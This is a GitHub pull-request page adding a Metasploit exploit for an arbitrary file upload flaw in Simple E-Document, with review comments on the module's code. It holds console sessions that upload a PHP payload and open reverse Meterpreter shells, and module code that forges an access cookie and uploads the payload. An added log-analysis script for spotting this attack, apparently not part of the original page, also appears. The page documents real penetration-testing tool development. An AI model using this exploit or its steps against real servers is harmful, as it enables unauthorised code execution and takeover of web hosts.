Add Simple E-Document Arbitrary File Upload module #2913

Merged
merged 1 commit into from Jan 27, 2014


@bcoles
Contributor
bcoles commented Jan 24, 2014

Add Simple E-Document Arbitrary File Upload module.

Just another example of arbitrary file upload+exec with grepping for the upload directory.

Homepage: http://sourceforge.net/projects/simplee-doc/
Tested on: Simple E-Document versions 3.0 and 3.1 (Kali Linux)

exploit

Output

msf > use exploit/unix/webapp/simple_e_document_upload_exec 
msf exploit(simple_e_document_upload_exec) > set RHOST 192.168.237.136
RHOST => 192.168.237.136
msf exploit(simple_e_document_upload_exec) > check
[*] The target appears to be vulnerable.
msf exploit(simple_e_document_upload_exec) > run

[*] Started reverse handler on 192.168.237.134:4444 
[*] 192.168.237.136:80 - Uploading malicious file...
[+] 192.168.237.136:80 - Payload uploaded successfully.
[+] 192.168.237.136:80 - Found upload path /simple_e_document_v_1_31/in/
[*] 192.168.237.136:80 - Executing nvjATUN.php...
[*] Sending stage (39848 bytes) to 192.168.237.136
[*] Meterpreter session 1 opened (192.168.237.134:4444 -> 192.168.237.136:52521) at 2014-01-24 04:35:40 -0500
[+] Deleted nvjATUN.php
getuid

meterpreter > getuid
Server username: www-data (33)
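The session output above shows the pattern a web-server log records for this class of bug: a POST to upload.php, then a GET of a freshly created .php file under the upload directory from the same client. The following log-review script is an added example for defenders, not code from the pull request or from the Metasploit module. It assumes Apache/nginx "combined" log lines, the `/simple_e_document/in/` upload path shown in the output, and a five-minute correlation window; the sample log lines are constructed.

```ruby
# Added example (not part of the pull request or the Metasploit module):
# flag the upload-then-execute sequence visible in the session output above:
# a POST to upload.php followed shortly afterwards by a GET of a .php file
# under the upload directory (/in/) from the same client address.
require 'time'

# Apache/nginx "combined" log format. Captures: client IP, timestamp,
# method, request path, HTTP status.
LOG_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3})/

# Constructed sample log (not from a real server), modelled on the request
# sequence the module output shows plus two benign clients for contrast.
SAMPLE_LOG = <<~LOG
  192.168.172.1 - - [27/Jan/2014:07:49:40 -0600] "GET /simple_e_document/upload.php HTTP/1.1" 200 1433
  192.168.172.1 - - [27/Jan/2014:07:49:41 -0600] "POST /simple_e_document/upload.php?op=newin HTTP/1.1" 200 512
  192.168.172.1 - - [27/Jan/2014:07:49:42 -0600] "GET /simple_e_document/in/CvFUZ9Wl.php HTTP/1.1" 200 0
  10.0.0.5 - - [27/Jan/2014:08:10:01 -0600] "POST /simple_e_document/upload.php?op=newin HTTP/1.1" 200 512
  10.0.0.5 - - [27/Jan/2014:08:10:03 -0600] "GET /simple_e_document/in/quarterly_report.pdf HTTP/1.1" 200 88123
  10.0.0.7 - - [27/Jan/2014:09:00:00 -0600] "GET /simple_e_document/in/index.php HTTP/1.1" 200 0
LOG

Event = Struct.new(:ip, :time, :method, :path, :status)

# Parse one log line into an Event, or nil when the line does not match.
def parse_line(line)
  m = LOG_RE.match(line) or return nil
  Event.new(m[1], Time.strptime(m[2], '%d/%b/%Y:%H:%M:%S %z'), m[3], m[4], m[5].to_i)
end

# Returns [ip, script_path] pairs for every GET of a .php file under
# <base>/in/ that follows a successful POST to upload.php from the same
# client within +window+ seconds. A GET of a .php file with no preceding
# upload (e.g. the index.php that ships in /in/) is not reported.
def find_upload_exec(log_text, base: '/simple_e_document', window: 300)
  upload_re = %r{\A#{Regexp.escape(base)}/upload\.php(\?|\z)}
  exec_re   = %r{\A#{Regexp.escape(base)}/in/[^/?]+\.php(\?|\z)}
  last_upload = {} # ip => time of the most recent successful POST to upload.php
  alerts = []
  log_text.each_line do |line|
    ev = parse_line(line) or next
    if ev.method == 'POST' && ev.path =~ upload_re && ev.status == 200
      last_upload[ev.ip] = ev.time
    elsif ev.method == 'GET' && ev.path =~ exec_re
      t = last_upload[ev.ip]
      alerts << [ev.ip, ev.path] if t && ev.time - t <= window
    end
  end
  alerts
end

if __FILE__ == $0
  find_upload_exec(SAMPLE_LOG).each do |ip, path|
    puts "upload-then-execute from #{ip}: #{path}"
  end
end
```

Correlating on the same client and a short window keeps the rule quiet on ordinary document uploads (the PDF from 10.0.0.5) and on the application's own index.php, while still catching the sequence even though the module deletes the uploaded script afterwards: the access log keeps the record after the file is gone.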
@jvazquez-r7
Contributor

Processing!

@jvazquez-r7
Contributor

After installing simple_e_document, directories for uploads need to be configured correctly in order to work:

msf > use exploit/unix/webapp/simple_e_document_upload_exec 
msf exploit(simple_e_document_upload_exec) > show options

Module options (exploit/unix/webapp/simple_e_document_upload_exec):

   Name       Current Setting             Required  Description
   ----       ---------------             --------  -----------
   Proxies                                no        Use a proxy chain
   RHOST                                  yes       The target address
   RPORT      80                          yes       The target port
   TARGETURI  /simple_e_document_v_1_31/  yes       The base path to Simple E-Document
   VHOST                                  no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Generic (PHP Payload)


msf exploit(simple_e_document_upload_exec) > set RHOST 192.168.172.135
RHOST => 192.168.172.135
msf exploit(simple_e_document_upload_exec) > set TARGETURI /simple_e_document/
TARGETURI => /simple_e_document/
msf exploit(simple_e_document_upload_exec) > check
[*] The target appears to be vulnerable.
msf exploit(simple_e_document_upload_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.135:80 - Uploading malicious file...
[+] 192.168.172.135:80 - Payload uploaded successfully.
[+] 192.168.172.135:80 - Found upload path /simple_e_document/in
[*] 192.168.172.135:80 - Executing CvFUZ9Wl.php...
[*] Sending stage (39848 bytes) to 192.168.172.135
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.135:60319) at 2014-01-27 07:49:49 -0600
[+] Deleted CvFUZ9Wl.php

ls
^C[-] Exploit failed: Interrupt 

meterpreter > ls

Listing: /var/www/simple_e_document/in
======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  0     fil   2014-01-27 07:36:12 -0600  index.php

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.135 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(simple_e_document_upload_exec) > 
@jvazquez-r7 jvazquez-r7 commented on the diff Jan 27, 2014
...exploits/unix/webapp/simple_e_document_upload_exec.rb
+ OptString.new('TARGETURI', [true, 'The base path to Simple E-Document', '/simple_e_document_v_1_31/'])
+ ], self.class)
+ end
+
+ #
+ # Checks if target allows file uploads
+ #
+ def check
+ res = send_request_raw({
+ 'uri' => normalize_uri(target_uri.path, 'upload.php'),
+ 'cookie' => 'access=3'
+ })
+ if not res
+ print_error("#{peer} - Connection timed out")
+ return Exploit::CheckCode::Unknown
+ elsif res.body =~ /File Uploading Has Been Disabled/
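Review bot: `res.body =~ /File Uploading Has Been Disabled/` dereferences `res.body` without a nil check, so a response that has no body (an empty 200 or a redirect) raises NoMethodError inside `check` instead of returning a CheckCode; guard it the same way `res` is guarded, for example `elsif res.body and res.body.to_s =~ /File Uploading Has Been Disabled/`. The "Connection timed out" message in the `if not res` branch is also broader than it says, since a nil response covers any failed request, not only a timeout.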
@jvazquez-r7
jvazquez-r7 Jan 27, 2014 Contributor

elsif res.body and res.body.to_s =~ /File Uploading Has Been Disabled/

@jvazquez-r7 jvazquez-r7 commented on the diff Jan 27, 2014
...exploits/unix/webapp/simple_e_document_upload_exec.rb
+ end
+
+ #
+ # Checks if target allows file uploads
+ #
+ def check
+ res = send_request_raw({
+ 'uri' => normalize_uri(target_uri.path, 'upload.php'),
+ 'cookie' => 'access=3'
+ })
+ if not res
+ print_error("#{peer} - Connection timed out")
+ return Exploit::CheckCode::Unknown
+ elsif res.body =~ /File Uploading Has Been Disabled/
+ print_error("#{peer} - File uploads are disabled")
+ elsif res.body =~ /Upload File/
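Review bot: the "File uploads are disabled" branch only calls `print_error`; within the visible lines there is no explicit `return Exploit::CheckCode::Safe` for that case, unlike the `Unknown` branch above it. If the method relies on a fall-through return at its end, make the return explicit here so that a later edit to the `elsif` chain cannot change what `check` reports for a patched or hardened target. Both `res.body =~` tests also need the nil-body guard noted above.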
@jvazquez-r7
jvazquez-r7 Jan 27, 2014 Contributor

elsif res.body and res.body.to_s =~ /Upload File/

@jvazquez-r7 jvazquez-r7 commented on the diff Jan 27, 2014
...exploits/unix/webapp/simple_e_document_upload_exec.rb
+ end
+
+ #
+ # Uploads our malicious file
+ #
+ def upload
+ @fname = "#{rand_text_alphanumeric(rand(10)+6)}.php"
+ php = "<?php #{payload.encoded} ?>"
+ data = Rex::MIME::Message.new
+ data.add_part('upload', nil, nil, 'form-data; name="op1"')
+ data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"")
+ post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_')
+ print_status("#{peer} - Uploading malicious file...")
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'upload.php?op=newin'),
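Review bot: the query string is embedded in the path handed to `normalize_uri` (`'upload.php?op=newin'`), so it goes through the same path normalization as the rest of the URI; keep `'uri' => normalize_uri(target_uri.path, 'upload.php')` and pass the parameter separately with the HttpClient option `'vars_get' => { 'op' => 'newin' }`. A one-line comment explaining why the leading CRLF is stripped from the multipart body (`gsub(/^\r\n--_Part_/, '--_Part_')`) would also help future maintainers, since that workaround is otherwise opaque.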
@jvazquez-r7
jvazquez-r7 Jan 27, 2014 Contributor

use get_vars for op=newin

@jvazquez-r7
Contributor

Easy fixes, fixing by myself and landing, thanks @bcoles !

@jvazquez-r7 jvazquez-r7 added a commit that referenced this pull request Jan 27, 2014
@jvazquez-r7 jvazquez-r7 Land #2913, @bcoles Exploit for Simple E-Document f086655
@jvazquez-r7 jvazquez-r7 merged commit 32d6032 into rapid7:master Jan 27, 2014

1 check passed

default The Travis CI build passed
@jvazquez-r7
Contributor

Landed after last clean up here: 861126f

thanks @bcoles !

@bcoles bcoles deleted the bcoles:simple_e_document_upload_exec branch Jan 28, 2014